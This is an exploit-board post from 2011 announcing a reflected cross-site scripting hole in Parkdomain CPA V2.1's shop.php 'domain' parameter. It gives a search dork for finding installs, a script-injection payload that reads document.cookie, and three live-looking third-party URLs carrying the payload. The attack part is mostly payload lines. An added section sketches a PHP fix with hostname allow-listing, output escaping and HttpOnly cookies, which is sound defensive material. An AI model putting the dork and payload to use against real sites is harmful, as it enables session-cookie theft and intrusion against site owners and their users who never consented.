Parkdomain CPA V2.1 (shop.php) Remote XSS Exploit
2011-04-04 13:54:24
Posted by: HaNniBaL KsA
[./rS] r00t s3cur1ty t34m
[#] Title : Parkdomain CPA V2.1 (shop.php) Remote XSS Exploit!
[#] Version : 2.1
[#] Author : HaNniBaL KsA (HK)
[#] E-mail : [email protected] & [email protected]
[#] Software : Not Available ()
[#] Home : p0c.cc (Proof Of Concepts | P0C Team)
[#] Twitter : twitter.com/r00t_s3cur1ty
[#] Date : 02-04-2011
[#] Dork : Powered By Parkdomain CPA V2.1
[#] Category : Cross-site scripting (XSS)
[#] Tested on : Fedora 14 & Windows XP sp3 & Windows Vista
[!] Browser test : FireFox 3.6.15 & Chrome 10.0.648.151 & Opera 11.01
-------------------------------------------------------------------------
[+] Vulnerability:
[~] http://site/path/shop.php?domain=XSS
[+] Example:
[~] http://site/path/shop.php?domain="><script>alert(document.cookie);</script>
-------------------------------------------------------------------------
[#] Demo sites (3 vulnerable sites) :
[!] http://home.ppc1000.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://wwww.zccbw.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://www.offercpa.com/shop.php?domain="><script>alert(document.cookie);</script>
[OoPs! :P]
-------------------------------------------------------------------------
[-] Greetz 2 : Ejram Hacker ; SiLvEr.47 (Dr.SiLvEr) ; Sn!pEr.S!Te ; Abo z7z7 ; ViRuS KsA ; MooT Hacker ; NoQRQR ; Dr.KroOoZ ; Mr.DH ; ...All In MsN!
Fixes
No fixes
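
A mitigation sketch for the reflected `domain` parameter described above. This is an added example, not code from the advisory or from Parkdomain CPA: the shop.php source is not shown on the page, so the function names, the sample values and the assumption that the value is reflected into a double-quoted HTML attribute (suggested by the `">` prefix in the proof of concept) are illustrative.

```php
<?php
// Added example: hypothetical handling of shop.php's `domain` parameter.
// Function names are illustrative; the real shop.php code is not on the page.

// Allow-list check: accept only syntactically valid hostnames.
// \z (not $) is used so a trailing newline cannot slip past the pattern.
function valid_domain(string $value): bool
{
    if ($value === '' || strlen($value) > 253) {
        return false;
    }
    return preg_match(
        '/^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}\z/i',
        $value
    ) === 1;
}

// Output encoding for HTML text and quoted-attribute contexts.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the fragment that reflects the parameter (assumed attribute context).
// $raw is untyped on purpose: ?domain[]=x makes $_GET['domain'] an array.
function render_domain_field($raw): string
{
    if (!is_string($raw) || !valid_domain($raw)) {
        // Reject instead of echoing request-controlled input back.
        return '<p>Invalid domain.</p>';
    }
    return '<input type="text" name="domain" value="' . h($raw) . '">';
}

// Constructed sample inputs: a normal value and the advisory's test string.
$samples = ['example.com', '"><script>alert(document.cookie);</script>'];
foreach ($samples as $s) {
    echo render_domain_field($s), PHP_EOL;
    // What escaping alone emits when a value must be displayed verbatim:
    echo 'escaped: ', h($s), PHP_EOL;
}
```

Validation and encoding are applied together here: the allow-list rejects anything that is not a hostname, and the encoding keeps the output inert even if the pattern is later loosened. Marking the session cookie HttpOnly additionally keeps it out of reach of `document.cookie`, which is what the proof of concept reads.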